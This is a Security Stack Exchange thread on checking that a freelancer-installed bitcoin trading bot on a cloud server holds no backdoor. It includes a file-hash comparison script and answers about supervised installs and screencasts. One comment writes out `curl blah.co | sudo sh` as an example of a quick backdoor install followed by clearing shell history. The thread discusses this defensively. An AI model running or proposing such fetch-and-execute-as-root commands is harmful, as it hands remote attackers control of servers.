4

Context

I tried installing Tribeca (a bitcoin trading bot) myself yesterday, but messed it up somehow, as I'm not very familiar with Docker/Git/NPM/mongoDB technologies (a little knowledge is dangerous &c, &c).

I'd like to pay someone on Upwork to install it to a cloud server for me (I'm thinking Digital Ocean), but I was worried about the possibility of the freelancer being able to access my details/funds after the install and handover were completed.


Question

Is there any way to verify that the install of Tribeca is safe to use without my funds getting stolen and that the freelancer is unable to access it?

Here's what I thought of so far:

  • To verify that the code is the same, get the checksum of the installed code and the checksum of the Github repository, and compare them. I'm not sure if this would work if changes occurred to the files during installation
  • Entering my exchange API keys myself, after I'm satisfied that the freelancer doesn't have access/backdoors built in (this one is obvious).

Is it even possible to verify that the install isn't malicious, or am I going about this all wrong?


I'm a long-time Sec.SE lurker, but this is the first time I've posted a question. Please comment on how I can improve the question so it's more answerable - thanks :)

user29357
  • 41
  • 5
  • Checking for a backdoor is not necessarily obvious. How do you plan to check for it? If someone has root access to your server at any time, you can consider it compromised. The only solution is to fully reinstall your server. – Xavier59 Mar 15 '18 at 11:03
  • @Xavier59 - so is there no way to verify that the install is safe, if they install it? – user29357 Mar 15 '18 at 22:02
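A concrete form of the checksum idea from the question, as an added example that is not part of the original post or of Tribeca's own tooling: hash every file in a reference checkout you cloned yourself and in the installed tree, then diff the two manifests so that changed, added and missing files are named instead of just getting one mismatching overall checksum. It assumes a Linux userland with coreutils (find, sha256sum, sort, comm, sed, grep) and that both trees are at the same upstream commit; `.git` metadata is skipped because it legitimately differs between clones. A clean result only shows that this directory matches upstream. Dependencies installed by npm or Docker, cron jobs, extra services or SSH keys live outside it and are not covered, so it does not weaken Xavier59's point about unattended root access.

```shell
#!/bin/sh
# Added example (not from the question, not Tribeca's tooling): compare an
# installed source tree against a pristine reference checkout by hashing every
# regular file in both trees and diffing the two manifests.
# Assumes coreutils (find, sha256sum, sort, comm, sed, grep). File names
# containing newlines are not handled; that is fine for a source checkout.

# manifest DIR: one "sha256  ./relative/path" line per regular file, sorted
# bytewise so that comm(1) can diff two manifests. .git metadata is skipped.
manifest() {
  ( cd "$1" && find . -name .git -prune -o -type f -exec sha256sum {} + ) \
    | LC_ALL=C sort
}

# strip_hash: turn "sha256  ./path" lines into "./path" lines.
strip_hash() {
  sed 's/^[0-9a-f]*  //'
}

# compare_trees REFERENCE_DIR INSTALLED_DIR
# Prints one "MODIFIED|ADDED|MISSING ./path" line per discrepancy.
# Returns 0 when the trees are identical, 1 when anything differs, 2 on a
# setup error (missing directory, no temp dir).
compare_trees() {
  ref_dir=$1
  inst_dir=$2
  [ -d "$ref_dir" ] && [ -d "$inst_dir" ] || return 2
  tmp=$(mktemp -d) || return 2

  manifest "$ref_dir"  > "$tmp/ref"
  manifest "$inst_dir" > "$tmp/inst"
  strip_hash < "$tmp/ref"  > "$tmp/ref_paths"
  strip_hash < "$tmp/inst" > "$tmp/inst_paths"
  : > "$tmp/report"

  # Lines only in the installed manifest: the file is new, or its content
  # changed (same path, different hash).
  LC_ALL=C comm -13 "$tmp/ref" "$tmp/inst" | strip_hash | while IFS= read -r p; do
    if grep -qxF -- "$p" "$tmp/ref_paths"; then
      echo "MODIFIED $p"
    else
      echo "ADDED $p"
    fi
  done >> "$tmp/report"

  # Lines only in the reference manifest whose path no longer exists in the
  # install at all (modified files were already reported above).
  LC_ALL=C comm -23 "$tmp/ref" "$tmp/inst" | strip_hash | while IFS= read -r p; do
    grep -qxF -- "$p" "$tmp/inst_paths" || echo "MISSING $p"
  done >> "$tmp/report"

  cat "$tmp/report"
  if [ -s "$tmp/report" ]; then status=1; else status=0; fi
  rm -rf "$tmp"
  return "$status"
}

# Usage (placeholder paths; clone the reference yourself on a machine the
# freelancer never touched, and check out the same commit the install used):
#   git clone <upstream-repo-url> /tmp/tribeca-reference
#   git -C /tmp/tribeca-reference checkout <commit-the-install-used>
#   compare_trees /tmp/tribeca-reference /opt/tribeca && echo "tree matches"
```

Anything reported as MODIFIED or ADDED is a concrete thing to ask about (on Sec.SE or elsewhere) before any API key goes near the install; a legitimate install normally only adds configuration files you were told about.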

3 Answers

1

If you give them unattended access for any amount of time, you can't.

What you can do is for example to give them access to your desktop using some remote desktop software, then connect to the cloud server from your PC. If you watch them all the time, you can be sure there is no backdoor, if you understand everything they do.

Most likely you won't understand everything they do, else you'd just do it yourself. But at least you might notice suspicious actions.

Many screen sharing tools also allow you to record the screen. This way you could show the recording to someone else to check that no backdoor was installed.

The important point is that you never allow them to access the server on their own and watch everything they do.

Josef
  • 5,903
  • 25
  • 33
  • If I have root access on your machine and have to install a bunch of software, it will be very easy for me to also install a backdoor in the process. This will probably be one step in a thousand steps, and if you as a user have no knowledge at all about software and malware, you will have no idea what I did. On the other hand, a trained professional *might* catch it. But paying that person will be pretty expensive, because she has to watch a 5 hour video of me installing software. – Tom K. Mar 16 '18 at 09:47
  • @TomK. Well, paying one person to install software for 5h and paying another (or better, two) persons to watch this 5h installation would probably double (or triple) the cost. Still not unreasonable. – Josef Mar 16 '18 at 10:12
  • With a well prepared attacker, getting a backdoor installed can be pretty swift. A command like `curl blah.co | sudo sh` can be pasted and run in a blink, and if the script clears the terminal history afterwards, there's no way for you to know that it happened. – Lie Ryan Mar 16 '18 at 11:23
  • Directly piping a downloaded file to a shell would be something that I'd call suspicious... – Lukas Mar 16 '18 at 12:28
  • Hmm, good answer. I was thinking of getting them to register a cloud server then turn it over to me afterward, but obviously the same concerns would still apply. On another note - would a highly-rated user's fear of a low rating be great enough to prevent them doing a bad/malicious job? – user29357 Mar 16 '18 at 21:42
  • @user29357 A highly-rated person will be less likely to do something malicious, because that means they care about their reputation. Of course, it is still far less safe than having a professional whose *job* it is to do this. – forest Mar 17 '18 at 00:52
  • 1
    @user29357 would stealing all your bitcoins be worth more to that person than the negative rating you could give them? (Keep in mind a highly rated person most likely has many ratings already, so your single feedback won't influence that much). Also, if I were that person I'd steal your bitcoins maybe half a year later. Impossible to prove that it was the person initially installing your bot. – Josef Mar 19 '18 at 11:48
  • @Josef, stealing my bitcoins would be worth very little :D Good point though - I could go through the exercise solely to gain the screencast of the install, then follow the steps myself to replicate it. Hey that's a good idea! I'll post it as an answer. – user29357 Mar 19 '18 at 19:45
1

You could task someone to create very exact and simple instructions for setting up the bot (take this bash .sh file I wrote, edit your API key into it, start a DigitalOcean server with the Ubuntu 16.04 image, scp the .sh file onto the server, and run it), and then you follow the instructions yourself.

The only issue is that they'll need a DigitalOcean account and maybe an exchange account to test things out. You could reimburse them for using their own accounts, or maybe give them limited access to your accounts. (Maybe you could create a DigitalOcean team, add them to the team so they can create a server, and after they're done you remove them from the team and remove any leftover servers. Maybe you can give them a read-only API key to your exchange account that doesn't have permission to do trades, and you revoke the API key once they're done testing things.)

Macil
  • 1,482
  • 9
  • 11
  • It's not always that easy to automate the installation of a complex framework. You would need to write a very well tested and rugged shell script, not just stick together a couple of lines of `ed`, `mv`, and `apt`. – forest Mar 17 '18 at 01:46
  • I'm not technical enough to even install it, so I can't do the exact simple instructions :( +1 though, I like the DigitalOcean team idea. – user29357 Mar 17 '18 at 02:46
0

Follow through on posting the job ad to Upwork, and place special emphasis on the screencast.

Once you have the screencast, replicate it with another install on a cloud server that no one else has touched.

If there's anything suspicious in the screencast (e.g. changing code), ask someone else about it (maybe on Sec.SE) before going through with it.

In essence, you are paying someone to create a set of detailed instructions (via video) for installing it, with the install being handled by yourself.

This is an answer to my own question, provoked by one of the comments to another answer.

user29357
  • 41
  • 5